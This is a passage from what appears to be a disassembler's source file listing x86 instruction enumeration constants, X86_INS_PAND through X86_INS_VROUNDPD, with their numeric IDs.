X86_INS_PAND = 392, X86_INS_PAVGB = 393, X86_INS_PAVGW = 394, X86_INS_PCMPEQB = 395, X86_INS_PCMPEQD = 396, X86_INS_PCMPEQW = 397, X86_INS_PCMPGTB = 398, X86_INS_PCMPGTD = 399, X86_INS_PCMPGTW = 400, X86_INS_PEXTRW = 401, 
X86_INS_PHADDSW = 402, X86_INS_PHADDW = 403, X86_INS_PHADDD = 404, X86_INS_PHSUBD = 405, X86_INS_PHSUBSW = 406, X86_INS_PHSUBW = 407, X86_INS_PINSRW = 408, X86_INS_PMADDUBSW = 409, X86_INS_PMADDWD = 410, X86_INS_PMAXSW = 411, X86_INS_PMAXUB = 412, X86_INS_PMINSW = 413, X86_INS_PMINUB = 414, X86_INS_PMOVMSKB = 415, X86_INS_PMULHRSW = 416, X86_INS_PMULHUW = 417, X86_INS_PMULHW = 418, X86_INS_PMULLW = 419, X86_INS_PMULUDQ = 420, X86_INS_POR = 421, X86_INS_PSADBW = 422, X86_INS_PSHUFB = 423, X86_INS_PSHUFW = 424, X86_INS_PSIGNB = 425, X86_INS_PSIGND = 426, X86_INS_PSIGNW = 427, X86_INS_PSLLD = 428, X86_INS_PSLLQ = 429, X86_INS_PSLLW = 430, X86_INS_PSRAD = 431, X86_INS_PSRAW = 432, X86_INS_PSRLD = 433, X86_INS_PSRLQ = 434, X86_INS_PSRLW = 435, X86_INS_PSUBB = 436, X86_INS_PSUBD = 437, X86_INS_PSUBQ = 438, X86_INS_PSUBSB = 439, X86_INS_PSUBSW = 440, X86_INS_PSUBUSB = 441, X86_INS_PSUBUSW = 442, X86_INS_PSUBW = 443, X86_INS_PUNPCKHBW = 444, X86_INS_PUNPCKHDQ = 445, X86_INS_PUNPCKHWD = 446, X86_INS_PUNPCKLBW = 447, X86_INS_PUNPCKLDQ = 448, X86_INS_PUNPCKLWD = 449, X86_INS_PXOR = 450, X86_INS_MONITOR = 451, X86_INS_MONTMUL = 452, X86_INS_MOV = 453, X86_INS_MOVABS = 454, X86_INS_MOVBE = 455, X86_INS_MOVDDUP = 456, X86_INS_MOVDQA = 457, X86_INS_MOVDQU = 458, X86_INS_MOVHLPS = 459, X86_INS_MOVHPD = 460, X86_INS_MOVHPS = 461, X86_INS_MOVLHPS = 462, X86_INS_MOVLPD = 463, X86_INS_MOVLPS = 464, X86_INS_MOVMSKPD = 465, X86_INS_MOVMSKPS = 466, X86_INS_MOVNTDQA = 467, X86_INS_MOVNTDQ = 468, X86_INS_MOVNTI = 469, X86_INS_MOVNTPD = 470, X86_INS_MOVNTPS = 471, X86_INS_MOVNTSD = 472, X86_INS_MOVNTSS = 473, X86_INS_MOVSB = 474, X86_INS_MOVSD = 475, X86_INS_MOVSHDUP = 476, X86_INS_MOVSLDUP = 477, X86_INS_MOVSQ = 478, X86_INS_MOVSS = 479, X86_INS_MOVSW = 480, X86_INS_MOVSX = 481, X86_INS_MOVSXD = 482, X86_INS_MOVUPD = 483, X86_INS_MOVUPS = 484, X86_INS_MOVZX = 485, X86_INS_MPSADBW = 486, X86_INS_MUL = 487, X86_INS_MULPD = 488, X86_INS_MULPS = 489, X86_INS_MULSD = 490, X86_INS_MULSS = 491, X86_INS_MULX = 492, X86_INS_FMUL = 493, X86_INS_FIMUL = 494, X86_INS_FMULP = 495, X86_INS_MWAIT = 496, X86_INS_NEG = 497, X86_INS_NOP = 498, X86_INS_NOT = 499, X86_INS_OUT = 500, X86_INS_OUTSB = 501, X86_INS_OUTSD = 502, X86_INS_OUTSW = 503, X86_INS_PACKUSDW = 504, X86_INS_PAUSE = 505, X86_INS_PAVGUSB = 506, X86_INS_PBLENDVB = 507, X86_INS_PBLENDW = 508, X86_INS_PCLMULQDQ = 509, X86_INS_PCMPEQQ = 510, X86_INS_PCMPESTRI = 511, X86_INS_PCMPESTRM = 512, X86_INS_PCMPGTQ = 513, X86_INS_PCMPISTRI = 514, X86_INS_PCMPISTRM = 515, X86_INS_PCOMMIT = 516, X86_INS_PDEP = 517, X86_INS_PEXT = 518, X86_INS_PEXTRB = 519, X86_INS_PEXTRD = 520, X86_INS_PEXTRQ = 521, X86_INS_PF2ID = 522, X86_INS_PF2IW = 523, X86_INS_PFACC = 524, X86_INS_PFADD = 525, X86_INS_PFCMPEQ = 526, X86_INS_PFCMPGE = 527, X86_INS_PFCMPGT = 528, X86_INS_PFMAX = 529, X86_INS_PFMIN = 530, X86_INS_PFMUL = 531, X86_INS_PFNACC = 532, X86_INS_PFPNACC = 533, X86_INS_PFRCPIT1 = 534, X86_INS_PFRCPIT2 = 535, X86_INS_PFRCP = 536, X86_INS_PFRSQIT1 = 537, X86_INS_PFRSQRT = 538, X86_INS_PFSUBR = 539, X86_INS_PFSUB = 540, X86_INS_PHMINPOSUW = 541, X86_INS_PI2FD = 542, X86_INS_PI2FW = 543, X86_INS_PINSRB = 544, X86_INS_PINSRD = 545, X86_INS_PINSRQ = 546, X86_INS_PMAXSB = 547, X86_INS_PMAXSD = 548, X86_INS_PMAXUD = 549, X86_INS_PMAXUW = 550, X86_INS_PMINSB = 551, X86_INS_PMINSD = 552, X86_INS_PMINUD = 553, X86_INS_PMINUW = 554, X86_INS_PMOVSXBD = 555, X86_INS_PMOVSXBQ = 556, X86_INS_PMOVSXBW = 557, X86_INS_PMOVSXDQ = 558, X86_INS_PMOVSXWD = 559, X86_INS_PMOVSXWQ = 560, X86_INS_PMOVZXBD = 561, 
X86_INS_PMOVZXBQ = 562, X86_INS_PMOVZXBW = 563, X86_INS_PMOVZXDQ = 564, X86_INS_PMOVZXWD = 565, X86_INS_PMOVZXWQ = 566, X86_INS_PMULDQ = 567, X86_INS_PMULHRW = 568, X86_INS_PMULLD = 569, X86_INS_POP = 570, X86_INS_POPAW = 571, X86_INS_POPAL = 572, X86_INS_POPCNT = 573, X86_INS_POPF = 574, X86_INS_POPFD = 575, X86_INS_POPFQ = 576, X86_INS_PREFETCH = 577, X86_INS_PREFETCHNTA = 578, X86_INS_PREFETCHT0 = 579, X86_INS_PREFETCHT1 = 580, X86_INS_PREFETCHT2 = 581, X86_INS_PREFETCHW = 582, X86_INS_PSHUFD = 583, X86_INS_PSHUFHW = 584, X86_INS_PSHUFLW = 585, X86_INS_PSLLDQ = 586, X86_INS_PSRLDQ = 587, X86_INS_PSWAPD = 588, X86_INS_PTEST = 589, X86_INS_PUNPCKHQDQ = 590, X86_INS_PUNPCKLQDQ = 591, X86_INS_PUSH = 592, X86_INS_PUSHAW = 593, X86_INS_PUSHAL = 594, X86_INS_PUSHF = 595, X86_INS_PUSHFD = 596, X86_INS_PUSHFQ = 597, X86_INS_RCL = 598, X86_INS_RCPPS = 599, X86_INS_RCPSS = 600, X86_INS_RCR = 601, X86_INS_RDFSBASE = 602, X86_INS_RDGSBASE = 603, X86_INS_RDMSR = 604, X86_INS_RDPMC = 605, X86_INS_RDRAND = 606, X86_INS_RDSEED = 607, X86_INS_RDTSC = 608, X86_INS_RDTSCP = 609, X86_INS_ROL = 610, X86_INS_ROR = 611, X86_INS_RORX = 612, X86_INS_ROUNDPD = 613, X86_INS_ROUNDPS = 614, X86_INS_ROUNDSD = 615, X86_INS_ROUNDSS = 616, X86_INS_RSM = 617, X86_INS_RSQRTPS = 618, X86_INS_RSQRTSS = 619, X86_INS_SAHF = 620, X86_INS_SAL = 621, X86_INS_SALC = 622, X86_INS_SAR = 623, X86_INS_SARX = 624, X86_INS_SBB = 625, X86_INS_SCASB = 626, X86_INS_SCASD = 627, X86_INS_SCASQ = 628, X86_INS_SCASW = 629, X86_INS_SETAE = 630, X86_INS_SETA = 631, X86_INS_SETBE = 632, X86_INS_SETB = 633, X86_INS_SETE = 634, X86_INS_SETGE = 635, X86_INS_SETG = 636, X86_INS_SETLE = 637, X86_INS_SETL = 638, X86_INS_SETNE = 639, X86_INS_SETNO = 640, X86_INS_SETNP = 641, X86_INS_SETNS = 642, X86_INS_SETO = 643, X86_INS_SETP = 644, X86_INS_SETS = 645, X86_INS_SFENCE = 646, X86_INS_SGDT = 647, X86_INS_SHA1MSG1 = 648, X86_INS_SHA1MSG2 = 649, X86_INS_SHA1NEXTE = 650, X86_INS_SHA1RNDS4 = 651, X86_INS_SHA256MSG1 = 652, X86_INS_SHA256MSG2 = 653, X86_INS_SHA256RNDS2 = 654, X86_INS_SHL = 655, X86_INS_SHLD = 656, X86_INS_SHLX = 657, X86_INS_SHR = 658, X86_INS_SHRD = 659, X86_INS_SHRX = 660, X86_INS_SHUFPD = 661, X86_INS_SHUFPS = 662, X86_INS_SIDT = 663, X86_INS_FSIN = 664, X86_INS_SKINIT = 665, X86_INS_SLDT = 666, X86_INS_SMSW = 667, X86_INS_SQRTPD = 668, X86_INS_SQRTPS = 669, X86_INS_SQRTSD = 670, X86_INS_SQRTSS = 671, X86_INS_FSQRT = 672, X86_INS_STAC = 673, X86_INS_STC = 674, X86_INS_STD = 675, X86_INS_STGI = 676, X86_INS_STI = 677, X86_INS_STMXCSR = 678, X86_INS_STOSB = 679, X86_INS_STOSD = 680, X86_INS_STOSQ = 681, X86_INS_STOSW = 682, X86_INS_STR = 683, X86_INS_FST = 684, X86_INS_FSTP = 685, X86_INS_FSTPNCE = 686, X86_INS_FXCH = 687, X86_INS_SUBPD = 688, X86_INS_SUBPS = 689, X86_INS_FSUBR = 690, X86_INS_FISUBR = 691, X86_INS_FSUBRP = 692, X86_INS_SUBSD = 693, X86_INS_SUBSS = 694, X86_INS_FSUB = 695, X86_INS_FISUB = 696, X86_INS_FSUBP = 697, X86_INS_SWAPGS = 698, X86_INS_SYSCALL = 699, X86_INS_SYSENTER = 700, X86_INS_SYSEXIT = 701, X86_INS_SYSRET = 702, X86_INS_T1MSKC = 703, X86_INS_TEST = 704, X86_INS_UD2 = 705, X86_INS_FTST = 706, X86_INS_TZCNT = 707, X86_INS_TZMSK = 708, X86_INS_FUCOMPI = 709, X86_INS_FUCOMI = 710, X86_INS_FUCOMPP = 711, X86_INS_FUCOMP = 712, X86_INS_FUCOM = 713, X86_INS_UD2B = 714, X86_INS_UNPCKHPD = 715, X86_INS_UNPCKHPS = 716, X86_INS_UNPCKLPD = 717, X86_INS_UNPCKLPS = 718, X86_INS_VADDPD = 719, X86_INS_VADDPS = 720, X86_INS_VADDSD = 721, X86_INS_VADDSS = 722, X86_INS_VADDSUBPD = 723, X86_INS_VADDSUBPS = 724, X86_INS_VAESDECLAST = 
725, X86_INS_VAESDEC = 726, X86_INS_VAESENCLAST = 727, X86_INS_VAESENC = 728, X86_INS_VAESIMC = 729, X86_INS_VAESKEYGENASSIST = 730, X86_INS_VALIGND = 731, X86_INS_VALIGNQ = 732, X86_INS_VANDNPD = 733, X86_INS_VANDNPS = 734, X86_INS_VANDPD = 735, X86_INS_VANDPS = 736, X86_INS_VBLENDMPD = 737, X86_INS_VBLENDMPS = 738, X86_INS_VBLENDPD = 739, X86_INS_VBLENDPS = 740, X86_INS_VBLENDVPD = 741, X86_INS_VBLENDVPS = 742, X86_INS_VBROADCASTF128 = 743, X86_INS_VBROADCASTI32X4 = 744, X86_INS_VBROADCASTI64X4 = 745, X86_INS_VBROADCASTSD = 746, X86_INS_VBROADCASTSS = 747, X86_INS_VCMPPD = 748, X86_INS_VCMPPS = 749, X86_INS_VCMPSD = 750, X86_INS_VCMPSS = 751, X86_INS_VCOMPRESSPD = 752, X86_INS_VCOMPRESSPS = 753, X86_INS_VCVTDQ2PD = 754, X86_INS_VCVTDQ2PS = 755, X86_INS_VCVTPD2DQX = 756, X86_INS_VCVTPD2DQ = 757, X86_INS_VCVTPD2PSX = 758, X86_INS_VCVTPD2PS = 759, X86_INS_VCVTPD2UDQ = 760, X86_INS_VCVTPH2PS = 761, X86_INS_VCVTPS2DQ = 762, X86_INS_VCVTPS2PD = 763, X86_INS_VCVTPS2PH = 764, X86_INS_VCVTPS2UDQ = 765, X86_INS_VCVTSD2SI = 766, X86_INS_VCVTSD2USI = 767, X86_INS_VCVTSS2SI = 768, X86_INS_VCVTSS2USI = 769, X86_INS_VCVTTPD2DQX = 770, X86_INS_VCVTTPD2DQ = 771, X86_INS_VCVTTPD2UDQ = 772, X86_INS_VCVTTPS2DQ = 773, X86_INS_VCVTTPS2UDQ = 774, X86_INS_VCVTUDQ2PD = 775, X86_INS_VCVTUDQ2PS = 776, X86_INS_VDIVPD = 777, X86_INS_VDIVPS = 778, X86_INS_VDIVSD = 779, X86_INS_VDIVSS = 780, X86_INS_VDPPD = 781, X86_INS_VDPPS = 782, X86_INS_VERR = 783, X86_INS_VERW = 784, X86_INS_VEXP2PD = 785, X86_INS_VEXP2PS = 786, X86_INS_VEXPANDPD = 787, X86_INS_VEXPANDPS = 788, X86_INS_VEXTRACTF128 = 789, X86_INS_VEXTRACTF32X4 = 790, X86_INS_VEXTRACTF64X4 = 791, X86_INS_VEXTRACTI128 = 792, X86_INS_VEXTRACTI32X4 = 793, X86_INS_VEXTRACTI64X4 = 794, X86_INS_VEXTRACTPS = 795, X86_INS_VFMADD132PD = 796, X86_INS_VFMADD132PS = 797, X86_INS_VFMADDPD = 798, X86_INS_VFMADD213PD = 799, X86_INS_VFMADD231PD = 800, X86_INS_VFMADDPS = 801, X86_INS_VFMADD213PS = 802, X86_INS_VFMADD231PS = 803, X86_INS_VFMADDSD = 804, X86_INS_VFMADD213SD = 805, X86_INS_VFMADD132SD = 806, X86_INS_VFMADD231SD = 807, X86_INS_VFMADDSS = 808, X86_INS_VFMADD213SS = 809, X86_INS_VFMADD132SS = 810, X86_INS_VFMADD231SS = 811, X86_INS_VFMADDSUB132PD = 812, X86_INS_VFMADDSUB132PS = 813, X86_INS_VFMADDSUBPD = 814, X86_INS_VFMADDSUB213PD = 815, X86_INS_VFMADDSUB231PD = 816, X86_INS_VFMADDSUBPS = 817, X86_INS_VFMADDSUB213PS = 818, X86_INS_VFMADDSUB231PS = 819, X86_INS_VFMSUB132PD = 820, X86_INS_VFMSUB132PS = 821, X86_INS_VFMSUBADD132PD = 822, X86_INS_VFMSUBADD132PS = 823, X86_INS_VFMSUBADDPD = 824, X86_INS_VFMSUBADD213PD = 825, X86_INS_VFMSUBADD231PD = 826, X86_INS_VFMSUBADDPS = 827, X86_INS_VFMSUBADD213PS = 828, X86_INS_VFMSUBADD231PS = 829, X86_INS_VFMSUBPD = 830, X86_INS_VFMSUB213PD = 831, X86_INS_VFMSUB231PD = 832, X86_INS_VFMSUBPS = 833, X86_INS_VFMSUB213PS = 834, X86_INS_VFMSUB231PS = 835, X86_INS_VFMSUBSD = 836, X86_INS_VFMSUB213SD = 837, X86_INS_VFMSUB132SD = 838, X86_INS_VFMSUB231SD = 839, X86_INS_VFMSUBSS = 840, X86_INS_VFMSUB213SS = 841, X86_INS_VFMSUB132SS = 842, X86_INS_VFMSUB231SS = 843, X86_INS_VFNMADD132PD = 844, X86_INS_VFNMADD132PS = 845, X86_INS_VFNMADDPD = 846, X86_INS_VFNMADD213PD = 847, X86_INS_VFNMADD231PD = 848, X86_INS_VFNMADDPS = 849, X86_INS_VFNMADD213PS = 850, X86_INS_VFNMADD231PS = 851, X86_INS_VFNMADDSD = 852, X86_INS_VFNMADD213SD = 853, X86_INS_VFNMADD132SD = 854, X86_INS_VFNMADD231SD = 855, X86_INS_VFNMADDSS = 856, X86_INS_VFNMADD213SS = 857, X86_INS_VFNMADD132SS = 858, X86_INS_VFNMADD231SS = 859, X86_INS_VFNMSUB132PD = 860, X86_INS_VFNMSUB132PS 
= 861, X86_INS_VFNMSUBPD = 862, X86_INS_VFNMSUB213PD = 863, X86_INS_VFNMSUB231PD = 864, X86_INS_VFNMSUBPS = 865, X86_INS_VFNMSUB213PS = 866, X86_INS_VFNMSUB231PS = 867, X86_INS_VFNMSUBSD = 868, X86_INS_VFNMSUB213SD = 869, X86_INS_VFNMSUB132SD = 870, X86_INS_VFNMSUB231SD = 871, X86_INS_VFNMSUBSS = 872, X86_INS_VFNMSUB213SS = 873, X86_INS_VFNMSUB132SS = 874, X86_INS_VFNMSUB231SS = 875, X86_INS_VFRCZPD = 876, X86_INS_VFRCZPS = 877, X86_INS_VFRCZSD = 878, X86_INS_VFRCZSS = 879, X86_INS_VORPD = 880, X86_INS_VORPS = 881, X86_INS_VXORPD = 882, X86_INS_VXORPS = 883, X86_INS_VGATHERDPD = 884, X86_INS_VGATHERDPS = 885, X86_INS_VGATHERPF0DPD = 886, X86_INS_VGATHERPF0DPS = 887, X86_INS_VGATHERPF0QPD = 888, X86_INS_VGATHERPF0QPS = 889, X86_INS_VGATHERPF1DPD = 890, X86_INS_VGATHERPF1DPS = 891, X86_INS_VGATHERPF1QPD = 892, X86_INS_VGATHERPF1QPS = 893, X86_INS_VGATHERQPD = 894, X86_INS_VGATHERQPS = 895, X86_INS_VHADDPD = 896, X86_INS_VHADDPS = 897, X86_INS_VHSUBPD = 898, X86_INS_VHSUBPS = 899, X86_INS_VINSERTF128 = 900, X86_INS_VINSERTF32X4 = 901, X86_INS_VINSERTF32X8 = 902, X86_INS_VINSERTF64X2 = 903, X86_INS_VINSERTF64X4 = 904, X86_INS_VINSERTI128 = 905, X86_INS_VINSERTI32X4 = 906, X86_INS_VINSERTI32X8 = 907, X86_INS_VINSERTI64X2 = 908, X86_INS_VINSERTI64X4 = 909, X86_INS_VINSERTPS = 910, X86_INS_VLDDQU = 911, X86_INS_VLDMXCSR = 912, X86_INS_VMASKMOVDQU = 913, X86_INS_VMASKMOVPD = 914, X86_INS_VMASKMOVPS = 915, X86_INS_VMAXPD = 916, X86_INS_VMAXPS = 917, X86_INS_VMAXSD = 918, X86_INS_VMAXSS = 919, X86_INS_VMCALL = 920, X86_INS_VMCLEAR = 921, X86_INS_VMFUNC = 922, X86_INS_VMINPD = 923, X86_INS_VMINPS = 924, X86_INS_VMINSD = 925, X86_INS_VMINSS = 926, X86_INS_VMLAUNCH = 927, X86_INS_VMLOAD = 928, X86_INS_VMMCALL = 929, X86_INS_VMOVQ = 930, X86_INS_VMOVDDUP = 931, X86_INS_VMOVD = 932, X86_INS_VMOVDQA32 = 933, X86_INS_VMOVDQA64 = 934, X86_INS_VMOVDQA = 935, X86_INS_VMOVDQU16 = 936, X86_INS_VMOVDQU32 = 937, X86_INS_VMOVDQU64 = 938, X86_INS_VMOVDQU8 = 939, X86_INS_VMOVDQU = 940, X86_INS_VMOVHLPS = 941, X86_INS_VMOVHPD = 942, X86_INS_VMOVHPS = 943, X86_INS_VMOVLHPS = 944, X86_INS_VMOVLPD = 945, X86_INS_VMOVLPS = 946, X86_INS_VMOVMSKPD = 947, X86_INS_VMOVMSKPS = 948, X86_INS_VMOVNTDQA = 949, X86_INS_VMOVNTDQ = 950, X86_INS_VMOVNTPD = 951, X86_INS_VMOVNTPS = 952, X86_INS_VMOVSD = 953, X86_INS_VMOVSHDUP = 954, X86_INS_VMOVSLDUP = 955, X86_INS_VMOVSS = 956, X86_INS_VMOVUPD = 957, X86_INS_VMOVUPS = 958, X86_INS_VMPSADBW = 959, X86_INS_VMPTRLD = 960, X86_INS_VMPTRST = 961, X86_INS_VMREAD = 962, X86_INS_VMRESUME = 963, X86_INS_VMRUN = 964, X86_INS_VMSAVE = 965, X86_INS_VMULPD = 966, X86_INS_VMULPS = 967, X86_INS_VMULSD = 968, X86_INS_VMULSS = 969, X86_INS_VMWRITE = 970, X86_INS_VMXOFF = 971, X86_INS_VMXON = 972, X86_INS_VPABSB = 973, X86_INS_VPABSD = 974, X86_INS_VPABSQ = 975, X86_INS_VPABSW = 976, X86_INS_VPACKSSDW = 977, X86_INS_VPACKSSWB = 978, X86_INS_VPACKUSDW = 979, X86_INS_VPACKUSWB = 980, X86_INS_VPADDB = 981, X86_INS_VPADDD = 982, X86_INS_VPADDQ = 983, X86_INS_VPADDSB = 984, X86_INS_VPADDSW = 985, X86_INS_VPADDUSB = 986, X86_INS_VPADDUSW = 987, X86_INS_VPADDW = 988, X86_INS_VPALIGNR = 989, X86_INS_VPANDD = 990, X86_INS_VPANDND = 991, X86_INS_VPANDNQ = 992, X86_INS_VPANDN = 993, X86_INS_VPANDQ = 994, X86_INS_VPAND = 995, X86_INS_VPAVGB = 996, X86_INS_VPAVGW = 997, X86_INS_VPBLENDD = 998, X86_INS_VPBLENDMB = 999, X86_INS_VPBLENDMD = 1000, X86_INS_VPBLENDMQ = 1001, X86_INS_VPBLENDMW = 1002, X86_INS_VPBLENDVB = 1003, X86_INS_VPBLENDW = 1004, X86_INS_VPBROADCASTB = 1005, X86_INS_VPBROADCASTD = 1006, 
X86_INS_VPBROADCASTMB2Q = 1007, X86_INS_VPBROADCASTMW2D = 1008, X86_INS_VPBROADCASTQ = 1009, X86_INS_VPBROADCASTW = 1010, X86_INS_VPCLMULQDQ = 1011, X86_INS_VPCMOV = 1012, X86_INS_VPCMPB = 1013, X86_INS_VPCMPD = 1014, X86_INS_VPCMPEQB = 1015, X86_INS_VPCMPEQD = 1016, X86_INS_VPCMPEQQ = 1017, X86_INS_VPCMPEQW = 1018, X86_INS_VPCMPESTRI = 1019, X86_INS_VPCMPESTRM = 1020, X86_INS_VPCMPGTB = 1021, X86_INS_VPCMPGTD = 1022, X86_INS_VPCMPGTQ = 1023, X86_INS_VPCMPGTW = 1024, X86_INS_VPCMPISTRI = 1025, X86_INS_VPCMPISTRM = 1026, X86_INS_VPCMPQ = 1027, X86_INS_VPCMPUB = 1028, X86_INS_VPCMPUD = 1029, X86_INS_VPCMPUQ = 1030, X86_INS_VPCMPUW = 1031, X86_INS_VPCMPW = 1032, X86_INS_VPCOMB = 1033, X86_INS_VPCOMD = 1034, X86_INS_VPCOMPRESSD = 1035, X86_INS_VPCOMPRESSQ = 1036, X86_INS_VPCOMQ = 1037, X86_INS_VPCOMUB = 1038, X86_INS_VPCOMUD = 1039, X86_INS_VPCOMUQ = 1040, X86_INS_VPCOMUW = 1041, X86_INS_VPCOMW = 1042, X86_INS_VPCONFLICTD = 1043, X86_INS_VPCONFLICTQ = 1044, X86_INS_VPERM2F128 = 1045, X86_INS_VPERM2I128 = 1046, X86_INS_VPERMD = 1047, X86_INS_VPERMI2D = 1048, X86_INS_VPERMI2PD = 1049, X86_INS_VPERMI2PS = 1050, X86_INS_VPERMI2Q = 1051, X86_INS_VPERMIL2PD = 1052, X86_INS_VPERMIL2PS = 1053, X86_INS_VPERMILPD = 1054, X86_INS_VPERMILPS = 1055, X86_INS_VPERMPD = 1056, X86_INS_VPERMPS = 1057, X86_INS_VPERMQ = 1058, X86_INS_VPERMT2D = 1059, X86_INS_VPERMT2PD = 1060, X86_INS_VPERMT2PS = 1061, X86_INS_VPERMT2Q = 1062, X86_INS_VPEXPANDD = 1063, X86_INS_VPEXPANDQ = 1064, X86_INS_VPEXTRB = 1065, X86_INS_VPEXTRD = 1066, X86_INS_VPEXTRQ = 1067, X86_INS_VPEXTRW = 1068, X86_INS_VPGATHERDD = 1069, X86_INS_VPGATHERDQ = 1070, X86_INS_VPGATHERQD = 1071, X86_INS_VPGATHERQQ = 1072, X86_INS_VPHADDBD = 1073, X86_INS_VPHADDBQ = 1074, X86_INS_VPHADDBW = 1075, X86_INS_VPHADDDQ = 1076, X86_INS_VPHADDD = 1077, X86_INS_VPHADDSW = 1078, X86_INS_VPHADDUBD = 1079, X86_INS_VPHADDUBQ = 1080, X86_INS_VPHADDUBW = 1081, X86_INS_VPHADDUDQ = 1082, X86_INS_VPHADDUWD = 1083, X86_INS_VPHADDUWQ = 1084, X86_INS_VPHADDWD = 1085, X86_INS_VPHADDWQ = 1086, X86_INS_VPHADDW = 1087, X86_INS_VPHMINPOSUW = 1088, X86_INS_VPHSUBBW = 1089, X86_INS_VPHSUBDQ = 1090, X86_INS_VPHSUBD = 1091, X86_INS_VPHSUBSW = 1092, X86_INS_VPHSUBWD = 1093, X86_INS_VPHSUBW = 1094, X86_INS_VPINSRB = 1095, X86_INS_VPINSRD = 1096, X86_INS_VPINSRQ = 1097, X86_INS_VPINSRW = 1098, X86_INS_VPLZCNTD = 1099, X86_INS_VPLZCNTQ = 1100, X86_INS_VPMACSDD = 1101, X86_INS_VPMACSDQH = 1102, X86_INS_VPMACSDQL = 1103, X86_INS_VPMACSSDD = 1104, X86_INS_VPMACSSDQH = 1105, X86_INS_VPMACSSDQL = 1106, X86_INS_VPMACSSWD = 1107, X86_INS_VPMACSSWW = 1108, X86_INS_VPMACSWD = 1109, X86_INS_VPMACSWW = 1110, X86_INS_VPMADCSSWD = 1111, X86_INS_VPMADCSWD = 1112, X86_INS_VPMADDUBSW = 1113, X86_INS_VPMADDWD = 1114, X86_INS_VPMASKMOVD = 1115, X86_INS_VPMASKMOVQ = 1116, X86_INS_VPMAXSB = 1117, X86_INS_VPMAXSD = 1118, X86_INS_VPMAXSQ = 1119, X86_INS_VPMAXSW = 1120, X86_INS_VPMAXUB = 1121, X86_INS_VPMAXUD = 1122, X86_INS_VPMAXUQ = 1123, X86_INS_VPMAXUW = 1124, X86_INS_VPMINSB = 1125, X86_INS_VPMINSD = 1126, X86_INS_VPMINSQ = 1127, X86_INS_VPMINSW = 1128, X86_INS_VPMINUB = 1129, X86_INS_VPMINUD = 1130, X86_INS_VPMINUQ = 1131, X86_INS_VPMINUW = 1132, X86_INS_VPMOVDB = 1133, X86_INS_VPMOVDW = 1134, X86_INS_VPMOVM2B = 1135, X86_INS_VPMOVM2D = 1136, X86_INS_VPMOVM2Q = 1137, X86_INS_VPMOVM2W = 1138, X86_INS_VPMOVMSKB = 1139, X86_INS_VPMOVQB = 1140, X86_INS_VPMOVQD = 1141, X86_INS_VPMOVQW = 1142, X86_INS_VPMOVSDB = 1143, X86_INS_VPMOVSDW = 1144, X86_INS_VPMOVSQB = 1145, X86_INS_VPMOVSQD = 1146, X86_INS_VPMOVSQW = 
1147, X86_INS_VPMOVSXBD = 1148, X86_INS_VPMOVSXBQ = 1149, X86_INS_VPMOVSXBW = 1150, X86_INS_VPMOVSXDQ = 1151, X86_INS_VPMOVSXWD = 1152, X86_INS_VPMOVSXWQ = 1153, X86_INS_VPMOVUSDB = 1154, X86_INS_VPMOVUSDW = 1155, X86_INS_VPMOVUSQB = 1156, X86_INS_VPMOVUSQD = 1157, X86_INS_VPMOVUSQW = 1158, X86_INS_VPMOVZXBD = 1159, X86_INS_VPMOVZXBQ = 1160, X86_INS_VPMOVZXBW = 1161, X86_INS_VPMOVZXDQ = 1162, X86_INS_VPMOVZXWD = 1163, X86_INS_VPMOVZXWQ = 1164, X86_INS_VPMULDQ = 1165, X86_INS_VPMULHRSW = 1166, X86_INS_VPMULHUW = 1167, X86_INS_VPMULHW = 1168, X86_INS_VPMULLD = 1169, X86_INS_VPMULLQ = 1170, X86_INS_VPMULLW = 1171, X86_INS_VPMULUDQ = 1172, X86_INS_VPORD = 1173, X86_INS_VPORQ = 1174, X86_INS_VPOR = 1175, X86_INS_VPPERM = 1176, X86_INS_VPROTB = 1177, X86_INS_VPROTD = 1178, X86_INS_VPROTQ = 1179, X86_INS_VPROTW = 1180, X86_INS_VPSADBW = 1181, X86_INS_VPSCATTERDD = 1182, X86_INS_VPSCATTERDQ = 1183, X86_INS_VPSCATTERQD = 1184, X86_INS_VPSCATTERQQ = 1185, X86_INS_VPSHAB = 1186, X86_INS_VPSHAD = 1187, X86_INS_VPSHAQ = 1188, X86_INS_VPSHAW = 1189, X86_INS_VPSHLB = 1190, X86_INS_VPSHLD = 1191, X86_INS_VPSHLQ = 1192, X86_INS_VPSHLW = 1193, X86_INS_VPSHUFB = 1194, X86_INS_VPSHUFD = 1195, X86_INS_VPSHUFHW = 1196, X86_INS_VPSHUFLW = 1197, X86_INS_VPSIGNB = 1198, X86_INS_VPSIGND = 1199, X86_INS_VPSIGNW = 1200, X86_INS_VPSLLDQ = 1201, X86_INS_VPSLLD = 1202, X86_INS_VPSLLQ = 1203, X86_INS_VPSLLVD = 1204, X86_INS_VPSLLVQ = 1205, X86_INS_VPSLLW = 1206, X86_INS_VPSRAD = 1207, X86_INS_VPSRAQ = 1208, X86_INS_VPSRAVD = 1209, X86_INS_VPSRAVQ = 1210, X86_INS_VPSRAW = 1211, X86_INS_VPSRLDQ = 1212, X86_INS_VPSRLD = 1213, X86_INS_VPSRLQ = 1214, X86_INS_VPSRLVD = 1215, X86_INS_VPSRLVQ = 1216, X86_INS_VPSRLW = 1217, X86_INS_VPSUBB = 1218, X86_INS_VPSUBD = 1219, X86_INS_VPSUBQ = 1220, X86_INS_VPSUBSB = 1221, X86_INS_VPSUBSW = 1222, X86_INS_VPSUBUSB = 1223, X86_INS_VPSUBUSW = 1224, X86_INS_VPSUBW = 1225, X86_INS_VPTESTMD = 1226, X86_INS_VPTESTMQ = 1227, X86_INS_VPTESTNMD = 1228, X86_INS_VPTESTNMQ = 1229, X86_INS_VPTEST = 1230, X86_INS_VPUNPCKHBW = 1231, X86_INS_VPUNPCKHDQ = 1232, X86_INS_VPUNPCKHQDQ = 1233, X86_INS_VPUNPCKHWD = 1234, X86_INS_VPUNPCKLBW = 1235, X86_INS_VPUNPCKLDQ = 1236, X86_INS_VPUNPCKLQDQ = 1237, X86_INS_VPUNPCKLWD = 1238, X86_INS_VPXORD = 1239, X86_INS_VPXORQ = 1240, X86_INS_VPXOR = 1241, X86_INS_VRCP14PD = 1242, X86_INS_VRCP14PS = 1243, X86_INS_VRCP14SD = 1244, X86_INS_VRCP14SS = 1245, X86_INS_VRCP28PD = 1246, X86_INS_VRCP28PS = 1247, X86_INS_VRCP28SD = 1248, X86_INS_VRCP28SS = 1249, X86_INS_VRCPPS = 1250, X86_INS_VRCPSS = 1251, X86_INS_VRNDSCALEPD = 1252, X86_INS_VRNDSCALEPS = 1253, X86_INS_VRNDSCALESD = 1254, X86_INS_VRNDSCALESS = 1255, X86_INS_VROUNDPD = 